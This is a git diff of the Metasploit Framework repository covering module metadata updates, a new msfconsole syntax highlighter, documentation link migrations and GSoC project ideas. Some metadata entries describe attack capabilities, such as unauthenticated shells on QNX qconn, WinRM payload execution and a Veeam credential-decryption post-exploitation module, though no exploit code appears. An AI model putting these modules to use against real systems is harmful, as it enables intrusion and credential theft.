@@ -103285,6 +103969,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
      "shell",
@@ -103306,7 +103999,7 @@
      "Mor!p3r",
      "bcoles <bcoles@gmail.com>"
    ],
-    "description": "This module uses the qconn daemon on QNX systems to gain a shell.\n\n        The QNX qconn daemon does not require authentication and allows\n        remote users to execute arbitrary operating system commands.\n\n        This module has been tested successfully on QNX Neutrino 6.5.0 (x86)\n        and 6.5.0 SP1 (x86).",
+    "description": "This module uses the qconn daemon on QNX systems to gain a shell.\n\n          The QNX qconn daemon does not require authentication and allows\n          remote users to execute arbitrary operating system commands.\n\n          This module has been tested successfully on QNX Neutrino 6.5.0 (x86)\n          and 6.5.0 SP1 (x86).",
    "references": [
      "EDB-21520",
      "URL-https://www.optiv.com/blog/pentesting-qnx-neutrino-rtos",
@@ -103325,7 +104018,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-01 20:51:44 +0000",
    "path": "/modules/exploits/qnx/qconn/qconn_exec.rb",
    "is_install_path": true,
    "ref_name": "qnx/qconn/qconn_exec",
@@ -103333,6 +104026,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -152689,7 +153391,7 @@
    "targets": [
      "Windows x86/x64 with x86 payload"
    ],
-    "mod_time": "2021-09-08 21:56:02 +0000",
+    "mod_time": "2023-01-28 09:08:51 +0000",
    "path": "/modules/exploits/windows/local/anyconnect_lpe.rb",
    "is_install_path": true,
    "ref_name": "windows/local/anyconnect_lpe",
@@ -170411,7 +171113,7 @@
    "author": [
      "thelightcosine"
    ],
-    "description": "This module uses valid credentials to login to the WinRM service\n          and execute a payload. It has two available methods for payload\n          delivery: Powershell 2.0 and VBS CmdStager.\n\n          The module will check if Powershell 2.0 is available, and if so uses\n          that method. Otherwise it falls back to the VBS CmdStager which is\n          less stealthy.\n\n          IMPORTANT: If targeting an x64 system with the Powershell method\n          you MUST select an x64 payload. An x86 payload will never return.",
+    "description": "This module uses valid credentials to login to the WinRM service\n          and execute a payload. It has two available methods for payload\n          delivery: Powershell 2 (and above) and VBS CmdStager.\n\n          The module will check if Powershell is available, and if so uses\n          that method. Otherwise it falls back to the VBS CmdStager which is\n          less stealthy.",
    "references": [
      "URL-http://msdn.microsoft.com/en-us/library/windows/desktop/aa384426(v=vs.85).aspx"
    ],
@@ -170439,14 +171141,24 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2021-01-29 11:17:38 +0000",
+    "mod_time": "2023-01-03 11:26:07 +0000",
    "path": "/modules/exploits/windows/winrm/winrm_script_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/winrm/winrm_script_exec",
    "check": false,
-    "post_auth": true,
+    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -210518,7 +211230,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-08-25 16:26:47 +0000",
    "path": "/modules/post/multi/manage/autoroute.rb",
    "is_install_path": true,
    "ref_name": "multi/manage/autoroute",
@@ -212829,7 +213541,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-01-06 14:21:46 +0000",
    "path": "/modules/post/windows/escalate/golden_ticket.rb",
    "is_install_path": true,
    "ref_name": "windows/escalate/golden_ticket",
@@ -216308,6 +217020,51 @@
    ],
    "needs_cleanup": null
  },
+  "post_windows/gather/credentials/veeam_credential_dump": {
+    "name": "Veeam Backup and Replication Credentials Dump",
+    "fullname": "post/windows/gather/credentials/veeam_credential_dump",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2022-11-22",
+    "type": "post",
+    "author": [
+      "npm <npm@cesium137.io>"
+    ],
+    "description": "This module exports and decrypts credentials from Veeam Backup & Replication and\n          Veeam ONE Monitor Server to a CSV file; it is intended as a post-exploitation\n          module for Windows hosts with either of these products installed. The module\n          supports automatic detection of VBR / Veeam ONE and is capable of decrypting\n          credentials for all versions including the latest build of 11.x.",
+    "references": [
+      "URL-https://blog.checkymander.com/red%20team/veeam/decrypt-veeam-passwords/"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-18 14:27:28 +0000",
+    "path": "/modules/post/windows/gather/credentials/veeam_credential_dump.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/veeam_credential_dump",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null
+  },
  "post_windows/gather/credentials/viber": {
    "name": "Viber credential gatherer",
    "fullname": "post/windows/gather/credentials/viber",
@@ -6,4 +6,24 @@
 .language-mermaid .label {
    text-transform: inherit;
 }
+
+.language-msf .zp {
+    text-decoration: underline;
+}
+
+.language-msf .ze {
+    color: #960050;
+}
+
+.language-msf .zg {
+    color: #859900;
+}
+
+.language-msf .zs {
+    color: #268bd2;
+}
+
+.language-msf .zw {
+    color: orange;
+}
 </style>
@@ -0,0 +1,74 @@
+require 'rouge'
+
+# Custom highlighting support for Metasploit's prompt
+# https://rouge-ruby.github.io/docs/file.LexerDevelopment.html
+module Rouge
+  # Custom tokens specific to Msf, as the inbuilt lexer tokens can't capture
+  # the detail required for Msf's print_warning/print_good/etc calls.
+  module Tokens
+    def self.token(name, shortname, &b)
+      tok = Token.make_token(name, shortname, &b)
+      const_set(name, tok)
+    end
+
+    # The 'shortname' is the class used when generating the HTML. It is intentionally
+    # short to reduce HTML size.
+    # https://github.com/rouge-ruby/rouge/blob/a4ed658d2778a3e2d3e68873f7221b91149a2ed4/lib/rouge/token.rb#L69
+    SHORTNAME = 'z'
+
+    token :Msf, SHORTNAME do
+      # prompt - msf / msf5 / msf6 / meterpreter
+      token :Prompt, "#{SHORTNAME}p"
+      # [-]
+      token :Error, "#{SHORTNAME}e"
+      # [+]
+      token :Good, "#{SHORTNAME}g"
+      # [*]
+      token :Status, "#{SHORTNAME}s"
+      # [!]
+      token :Warning, "#{SHORTNAME}w"
+    end
+  end
+
+  module Lexers
+    class MetasploitConsoleLanguage < Rouge::RegexLexer
+      title 'msf'
+      tag 'msf'
+      desc 'Metasploit console highlighter'
+      filenames []
+      mimetypes []
+
+      def self.keywords
+        @keywords ||= Set.new %w()
+      end
+
+      state :whitespace do
+        rule %r/\s+/, Text
+      end
+
+      state :root do
+        mixin :whitespace
+
+        # Match msf, msf5, msf6, meterpreter
+        rule %r{^(msf\d?|meterpreter)}, Tokens::Msf::Prompt, :msf_prompt
+        rule %r{^\[-\]}, Tokens::Msf::Error
+        rule %r{^\[\+\]}, Tokens::Msf::Good
+        rule %r{^\[\*\]}, Tokens::Msf::Status
+        rule %r{^\[\!\]}, Tokens::Msf::Warning
+        rule %r{.+}, Text
+      end
+
+      # State for highlighting the prompt such as
+      # msf6 auxiliary(admin/dcerpc/cve_2022_26923_certifried) >
+      state :msf_prompt do
+        mixin :whitespace
+
+        rule %r{exploit|payload|auxiliary|encoder|evasion|post|nop}, Text
+        rule %r{\(}, Punctuation
+        rule %r{\)}, Punctuation
+        rule %r{[\w/]+}, Keyword::Constant
+        rule %r{>}, Punctuation, :pop!
+      end
+    end
+  end
+end
@@ -187,7 +187,7 @@ module Build
      @config.enum_for(:each).map { |page| page }
    end

-    # scans for absolute links to the old wiki such as 'https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service'
+    # scans for absolute links to the old wiki such as 'https://docs.metasploit.com/docs/using-metasploit/advanced/metasploit-web-service.html'
    def extract_absolute_wiki_links(markdown)
      new_links = {}

@@ -1,3 +1,3 @@
 View the latest API docs at:

-[https://rapid7.github.io/metasploit-framework/api/](https://rapid7.github.io/metasploit-framework/api/)
+[https://docs.metasploit.com/api/](https://docs.metasploit.com/api/)
@@ -78,7 +78,7 @@ Please select what kind of key you want:
   (4) RSA (sign only)
 Your selection? 4
 RSA keys may be between 1024 and 4096 bits long.
-What keysize do you want? (2048) 
+What keysize do you want? (2048)
 Requested keysize is 2048 bits
 Please specify how long the key should be valid.
         0 = key does not expire
@@ -96,7 +96,7 @@ from the Real Name, Comment and Email Address in this form:

 Real name: Dade Murphy
 Email address: dmurphy@thegibson.example
-Comment: 
+Comment:
 You selected this USER-ID:
    "Dade Murphy <dmurphy@thegibson.example>"

@@ -120,7 +120,7 @@ Enter passphrase: [...]

 Using `git c` and `git m` from now on will sign every commit with your `DEADBEEF` key. However, note that rebasing or cherry-picking commits will change the commit hash, and therefore, unsign the commit -- to resign the most recent, use `git c --amend`.

-[msf-committers]:https://github.com/rapid7/metasploit-framework/wiki/Committer-Rights
+[msf-committers]:https://docs.metasploit.com/docs/development/maintainers/committer-rights.html
 [pro-sharing]:https://filippo.io/on-keybase-dot-io-and-encrypted-private-key-sharing/
 [con-sharing]:https://www.tbray.org/ongoing/When/201x/2014/03/19/Keybase#p-5
 [tracking]:https://github.com/keybase/keybase-issues/issues/100
@@ -2,7 +2,7 @@

 The term "Metasploit Committers" describes people who have direct write access to the [Rapid7 Metasploit-Framework fork](https://github.com/rapid7/metasploit-framework). These are the people who can land changes to this main fork of the Framework. However, it is not necessary to have committer rights in order to contribute to Metasploit. Much of our code comes from non-committers.

-We encourage anyone to fork the Metasploit project, make changes, fix bugs, and notify the core committers about those changes via [Pull Requests](http://github.com/rapid7/metasploit-framework/pulls). The process for getting started is most comprehensively documented in the [Metasploit Development Environment](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) setup guide.
+We encourage anyone to fork the Metasploit project, make changes, fix bugs, and notify the core committers about those changes via [Pull Requests](http://github.com/rapid7/metasploit-framework/pulls). The process for getting started is most comprehensively documented in the [[Metasploit Development Environment|./dev/Setting-Up-a-Metasploit-Development-Environment.md]] setup guide.

 Metasploit committers are a mix of [Rapid7](http://rapid7.com) employees and outside contributors. Anyone can become a contributor, with the following expectations:

@@ -24,7 +24,7 @@ If you reject a pull request, be clear in the pull request why it was rejected,

 Even if someone else approves of a pull request, and it is shown to be broken later, then it is still your responsibility to correct it. Make every effort to get a fix or revert in as soon as possible, whether you wrote the code, landed it, or approved it. Blame is shared equally.

-A list of committer public keys [is here](https://github.com/rapid7/metasploit-framework/wiki/Committer-Keys).
+A list of committer public keys [[is here|./Committer-Keys.md]].

 # How to Gain Commit Rights

@@ -45,7 +45,7 @@ Breaches of trust in terms of malicious or malformed code, or the demonstration

 # Useful Links for Committers

-  * [http://r-7.co/MSF-DEV](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) is pretty much required reading.
+  * [[Setting Up a Metasploit Development Environment|./dev/Setting-Up-a-Metasploit-Development-Environment.md]] is pretty much required reading.
  * So is [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md)
  * Check out the Apache Software Foundation's [Guide for Committers](https://www.apache.org/dev/committers). It's illuminating.
  * [Producing Open Source Software](http://www.producingoss.com/gl/) by Ken Fogel is a must-read.
@@ -6,13 +6,13 @@ whilst also avoiding some common pitfalls and learning how some of our systems w

 ## Initial Steps and Important Notes
 The rest of this guide assumes you have already followed the steps at [Setting Up A Developer Environment](https://r-7.co/MSF-DEV) in order to get
-a fork of Metasploit set up and ready to run, and that you have added in your SSH keys 
-(see [Adding a New SSH Key To Your GitHub Account](https://docs.github.com/en/authentication/connecting-to-github-with-ssh/adding-a-new-ssh-key-to-your-github-account)), 
+a fork of Metasploit set up and ready to run, and that you have added in your SSH keys
+(see [Adding a New SSH Key To Your GitHub Account](https://docs.github.com/en/authentication/connecting-to-github-with-ssh/adding-a-new-ssh-key-to-your-github-account)),
 set up Ruby and optionally the PostgreSQL database, and done any custom shortcuts you wish to configure.

 ## Getting the Latest Version of Metasploit Framework
 Before making any new contributions, you will want to sure you are running the latest version of Metasploit Framework.
-To do this run `git checkout master && git fetch upstream && git pull`, where `upstream` is the branch connected to the 
+To do this run `git checkout master && git fetch upstream && git pull`, where `upstream` is the branch connected to the
 Rapid7 remote, aka Rapid7's copy of the code. You can verify that `upstream` is set correctly by running `git remote get-url upstream`
 and verifying it is set to `git@github.com:rapid7/metasploit-framework.git`.

@@ -51,13 +51,13 @@ done when the code is ready to be landed into Metasploit Framework to help make

 ## Checking for Code Errors
 Before code can be accepted into Metasploit Framework, it must also pass our RuboCop and MsfTidy rules. These help ensure that
-all contributors are committing code that follows a common set of standards. To check if your code meets our RuboCop standards, 
+all contributors are committing code that follows a common set of standards. To check if your code meets our RuboCop standards,
 from the root of wherever you cloned your fork of Metasploit Framework to on disk, run `rubocop <path to your module from current directory>`.

 Specifying the `-a` parameter will ask RuboCop to check your module and if possible fix any issues that RuboCop is able to fix.
-In this case the command would be `rubocop -a <path to your module from current directory>`. It is encouraged to keep running 
-this command and fixing any issues that come up until RuboCop no longer comes back with any errors to report. Once this is 
-complete, run `git add <file>` followed by `git commit -m "RuboCop Fixes"`. You can change the commit message if you 
+In this case the command would be `rubocop -a <path to your module from current directory>`. It is encouraged to keep running
+this command and fixing any issues that come up until RuboCop no longer comes back with any errors to report. Once this is
+complete, run `git add <file>` followed by `git commit -m "RuboCop Fixes"`. You can change the commit message if you
 want, but it should mention RuboCop as it helps maintainers know what the commit is related to.

 As a good practice rule, you should always separate your commits that contain RuboCop changes from those that contain non-RuboCop related changes.
@@ -71,8 +71,8 @@ against your module code (if applicable), using `tools/dev/msftidy.rb <path to m
 if your module passed the tests. Try and fix any errors mentioned here.

 ## Writing Documentation
-The next step to do, if you are writing a module, is to write the documentation for the module. You can find some information 
-on how to write module documentation at [Writing Module Documentation](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html).
+The next step to do, if you are writing a module, is to write the documentation for the module. You can find some information
+on how to write module documentation at [[Writing Module Documentation|./Writing-Module-Documentation.md]].

 In general when writing documentation you will want to search for a similar documentation file under the `documentation`
 folder located in the root of the Metasploit fork. You can then copy one of these files and use it as the basis for writing
@@ -91,15 +91,15 @@ these may be okay to ignore depending on the context. A good example is if a lin
 safely ignored.

 ## Submitting Your Changes and Opening a PR
-Once you have gone through all of the steps above you should be ready to submit your PR. To submit your PR, first check which 
-branch points to your copy of the code. If you have followed the setup guide, it should be `origin`. You can double check this 
+Once you have gone through all of the steps above you should be ready to submit your PR. To submit your PR, first check which
+branch points to your copy of the code. If you have followed the setup guide, it should be `origin`. You can double check this
 branch's remote URL using `git remote get-url origin`. It should look something like `git@github.com:gwillcox-r7/metasploit-framework`
 with `gwillcox-r7` substituted for your username.

-Assuming the `origin` branch is in fact pointing to your copy of the code, run `git push origin local-branch:remote-branch` 
-and replace `local-branch` with the branch locally where your code changes are located, and `remote-branch` with what 
-you want this branch to be called on the remote repository, aka `origin` which will be your fork on GitHub.com. In most 
-cases you will want these two names to be the same to avoid confusion, but its good to know this syntax should you 
+Assuming the `origin` branch is in fact pointing to your copy of the code, run `git push origin local-branch:remote-branch`
+and replace `local-branch` with the branch locally where your code changes are located, and `remote-branch` with what
+you want this branch to be called on the remote repository, aka `origin` which will be your fork on GitHub.com. In most
+cases you will want these two names to be the same to avoid confusion, but its good to know this syntax should you
 start working with more complex situations. Note that if the branch pointing to your copy of the code is not named `origin`,
 replace the word `origin` in the command above with the name of the branch that does point to your copy of the code.

@@ -114,10 +114,10 @@ Compressing objects: 100% (8/8), done.
 Writing objects: 100% (8/8), 1.55 KiB | 1.55 MiB/s, done.
 Total 8 (delta 7), reused 0 (delta 0), pack-reused 0
 remote: Resolving deltas: 100% (7/7), completed with 7 local objects.
-remote: 
+remote:
 remote: Create a pull request for 'update_mssql_lib_parameters' on GitHub by visiting:
 remote:      https://github.com/gwillcox-r7/metasploit-framework/pull/new/update_mssql_lib_parameters
-remote: 
+remote:
 To github.com:gwillcox-r7/metasploit-framework
 * [new branch]            update_mssql_lib_parameters -> update_mssql_lib_parameters
 ```
@@ -12,7 +12,7 @@ compatibility of each.

 | Gadget Chain Name           | BinaryFormatter | LosFormatter | SoapFormatter |
 | --------------------------- | --------------- | ------------ | ------------- |
-| ClaimsPrincipal             | Yes             | Yes          | Yes           | 
+| ClaimsPrincipal             | Yes             | Yes          | Yes           |
 | TextFormattingRunProperties | Yes             | Yes          | Yes           |
 | TypeConfuseDelegate         | Yes             | Yes          | No            |
 | WindowsIdentity             | Yes             | Yes          | Yes           |
@@ -134,5 +134,5 @@ payloads such as Meterpreter.
 [5]: https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization/types
 [6]: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/util/dot_net_deserialization.rb
 [7]: https://github.com/rapid7/metasploit-framework/blob/master/spec/lib/msf/util/dot_net_deserialization_spec.rb
-[8]: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-command-stagers
-[9]: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Powershell-in-an-exploit
+[8]: https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html
+[9]: https://docs.metasploit.com/docs/development/developing-modules/libraries/how-to-use-powershell-in-an-exploit.html
@@ -12,8 +12,10 @@ The pgp signatures below can be verified with the following [public key](https:/

 |Download Link|File Type|SHA1|PGP|
 |-|-|-|-|
-| [metasploit-4.21.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
-| [metasploit-4.21.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)|
+| [metasploit-4.22.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
+| [metasploit-4.22.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)|
+| [metasploit-4.21.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.asc)|
+| [metasploit-4.21.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-linux-x64-installer.run.asc)|
 | [metasploit-4.21.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.asc)|
 | [metasploit-4.21.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.asc)|
 | [metasploit-4.20.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.asc)|
@@ -0,0 +1,61 @@
+GSoC Project Ideas in no particular order. When you've picked one, take a look at [[How-to-Apply-to-GSoC]] for how to make a proposal.
+
+Mentors: @jmartin-r7, @gwillcox-r7
+
+Slack Contacts: @Op3n4M3, @gwillcox-r7 on [Metasploit Slack](https://metasploit.slack.com/)
+
+For any questions about these projects reach out on the Metasploit Slack in the `#gsoc` channel or DM one of the mentors using the Slack contacts listed above. Note that mentors may be busy so please don't expect an immediate response, however we will endeavor to respond as soon as possible. If you'd prefer not to join Slack, you can also email `msfdev [@] metasploit [dot] com` and we will respond to your questions there if email is preferable.
+
+## Enhance Metasploit Framework
+
+### Rest API Pagination
+
+Metasploit provides two API interaction services, a Rest API service and an RPC service. Previous efforts have wrapped and exposed the RPC service as JSON responses available from the Rest API endpoint. This wrapping did not account for possible large responses that may benefit from pagination. A previous contributor attempted to add this functionality for a [limited set of RCP commands](https://github.com/rapid7/metasploit-framework/pull/13439) however review identified that the changes would introduce changes to the documented public API and also introduce inconsistency within the API responses resulting in a fluctuating public API. Modern pagination would be beneficial to increasing user adoption of Rest API services provided it can be implemented consistently and either maintain compatibility of the existing public RPC service or generate a one time migration across all exposed public APIs.
+
+Size: Large  
+Difficulty: 4/5
+
+### LDAP Capture Capabilities
+
+Metasploit's LDAP service mixin provides a service to enable interaction over the LDAP protocol. The current implementation is the bare minimum to enable support for attacking the [2021 Log4Shell vulnerability](). Enhancement/Extension of the mixin to enable various additional LDAP features would enable extended usage of this service for additional tasks. Support for various protocol level authentication methods would allow Metasploit to intercept and log authentication information. Specific items of interest are [SPNEGO](https://en.wikipedia.org/wiki/SPNEGO) and [StartTLS](https://ldapwiki.com/wiki/StartTLS) support to enable compatibility with the widest variety of clients and a new capture module that log authentication information from clients.
+
+Size: Medium  
+Difficulty: 3/5
+
+### Enhanced LDAP Query & Collection
+
+When preforming security assessment on a network with centralized login such as LDAP or Active Directory these services are sometimes exposed directly on the network. While Metasploit has capabilities to collect various pieces of information from these services when a user has been able to gain code execution inside a target system by utilizing tooling such as `Sharphound` or by leveraging SMB services via the `secrets_dump` module, these methods are somewhat indirect. A network base capability to query exposed services may have value. An interactive terminal plugin allowing users to connect directly to LDAP or Active Directory providing capabilities similar to the existing `requests` plugin could enable users search for valuable information in these services without the need to compromise a target or interact with a secondary service. 
+
+Size: Medium/Large (Depends on proposal)  
+Difficulty: 3/5
+
+### Improving post-exploit API to be more consistent, work smoothly across session types
+
+The Metasploit post-exploitation API is intended to provide a unified interface between different Meterpreter, shell, PowerShell, mainframe, and other session types. However, there are areas where the implementation is not consistent, and could use improvements:
+
+ * Shell sessions do not implement the filesystem API that Meterpreter sessions have
+ * When a shell session is in a different language, e.g. Windows in French, the post API does not find the expected output. Add localization support for these.
+ * Simple commands like 'cmd_exec' are fast in Shell sessions but are relatively slow in Meterpreter sessions. Add an API to make Meterpreter run simple commands more easily.
+
+Size: Medium/Large (Depends on proposal)  
+Difficulty: Varies
+
+### Improve the web vulnerability API
+
+This would follow up on the Arachni plugin PR <https://github.com/rapid7/metasploit-framework/pull/8618> and improve the Metasploit data model to better represent modern web vulnerabilities. This project would require knowledge of data models, types of modern web vulnerabilities, and experience with web app security scanners.
+
+Size: Large  
+Difficulty: 4/5
+
+### Data Visualization
+
+Enhance existing Metasploit Goliath dashboard that allows observation of an active engagement. Data visualization would include, but not be limited to: host node graph with activity indicators and heat maps. The main idea here is to create a visualization tool that helps users understand data that has been gathered into Metasploit during usage in some useful way. Proposals should note where the service will live, how a user will use the service, and how you will provide a maintainable and extendable consumer for the data that is exposed.
+
+See [Metasploit 'Goliath' Demo (msf-red)](https://www.youtube.com/watch?v=hvuy6A-ie1g&feature=youtu.be&t=176) for a demo video of Goliath in action. You can also read more on Metasploit Goliath at [Metasploit-Data-Service-Enhancements-(Goliath)](./Metasploit-Data-Service-Enhancements-Goliath)
+
+Size: Medium/Large (Depends on proposal)  
+Difficulty 3/5
+
+## Submit your own
+
+If you want to suggest your own idea, please discuss it with us first on [Slack](https://metasploit.com/slack) in the `#gsoc` channel to make sure it is a reasonable amount of work for a summer and that it fits the goals of the project.
@@ -27,9 +27,9 @@ The Metasploit Framework has seven different rankings to indicate how reliable a

 ## Template

-If you have read this far, we think you are pretty impressive because it's a lot to digest. You are probably wondering why we haven't had a single line of code to share in the writeup. Well, as you recall, exploit development is mostly about your reversing skills. If you have all that, we shouldn't be telling you how to write an exploit. What we've done so far is hopefully get your mindset dialed-in correctly about what it means to become a Metasploit exploit developer for the security community; the rest is more about how to use our mixins to build that exploit. Well, there are A LOT of mixins, so it's impossible to go over all of them in a single page, so you must either read the [API documentation](https://rapid7.github.io/metasploit-framework/api/), existing [code examples](https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits), or look for more wiki pages we've written to cover specific mixins.
+If you have read this far, we think you are pretty impressive because it's a lot to digest. You are probably wondering why we haven't had a single line of code to share in the writeup. Well, as you recall, exploit development is mostly about your reversing skills. If you have all that, we shouldn't be telling you how to write an exploit. What we've done so far is hopefully get your mindset dialed-in correctly about what it means to become a Metasploit exploit developer for the security community; the rest is more about how to use our mixins to build that exploit. Well, there are A LOT of mixins, so it's impossible to go over all of them in a single page, so you must either read the [API documentation](https://docs.metasploit.com/api/), existing [code examples](https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits), or look for more wiki pages we've written to cover specific mixins.

-For example, if you're looking for a writeup about how to interact with an HTTP server, you might be interested in: [How to send an HTTP Request Using HTTPClient](https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient). If you're interested in browser exploit writing, definitely check out: [How to write a browser exploit using BrowserExploitServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer), etc.
+For example, if you're looking for a writeup about how to interact with an HTTP server, you might be interested in: [[How to send an HTTP Request Using HTTPClient|./How-to-write-a-browser-exploit-using-HttpServer.md]]. If you're interested in browser exploit writing, definitely check out: [[How to write a browser exploit using BrowserExploitServer|./How-to-write-a-browser-exploit-using-BrowserExploitServer.md]], etc.

 But of course, to begin, you most likely need a template to work with, and here it is. We'll also explain how to fill out the required fields:

@@ -289,7 +289,7 @@ end

 msfconsole output:

-```
+```msf
 msf6 exploit(windows/smb/msf_smb_client_test) > options

 Module options (exploit/windows/smb/msf_smb_client_test):
@@ -406,7 +406,7 @@ end

 msfconsole output:

-```
+```msf
 msf6 exploit(windows/smb/ruby_smb_client_test) > options

 Module options (exploit/windows/smb/ruby_smb_client_test):
@@ -1,6 +1,6 @@
 # Intro

-This article will discuss the various libraries, dependencies, and functionality built in to metasploit for dealing with password hashes, and cracking them.  In general, this will not cover storing credentials in the database, which can be read about [here](https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners#the-scan-block).  Metasploit currently support cracking passwords with [John the Ripper](https://github.com/rapid7/metasploit-framework/tree/master/modules/auxiliary/analyze) and  [hashcat](https://github.com/rapid7/metasploit-framework/pull/11695).
+This article will discuss the various libraries, dependencies, and functionality built in to metasploit for dealing with password hashes, and cracking them.  In general, this will not cover storing credentials in the database, which can be read about [[here|./Creating-Metasploit-Framework-LoginScanners.md]].  Metasploit currently support cracking passwords with [John the Ripper](https://github.com/rapid7/metasploit-framework/tree/master/modules/auxiliary/analyze) and  [hashcat](https://github.com/rapid7/metasploit-framework/pull/11695).

 # Hashes

@@ -9,7 +9,7 @@ Many modules dump hashes from various software.  Anything from the OS: [Windows]
 ## Hash Identify Example

 In this first, simple, example we will simply show loading the library and calling its function.
-```
+```ruby
 require 'metasploit/framework/hashes/identify'
 puts identify_hash "$1$28772684$iEwNOgGugqO9.bIz5sk8k/"
 # note, bad hashes return an empty string since nil is not accepted when creating credentials in msf.
@@ -17,7 +17,7 @@ puts identify_hash "This_is a Fake Hash"
 puts identify_hash "_9G..8147mpcfKT8g0U."
 ```
 In practice, we receive the following output from this:
-```
+```ruby
 msf5 > irb
 [*] Starting IRB shell...
 [*] You are in the "framework" object
@@ -1,8 +1,8 @@
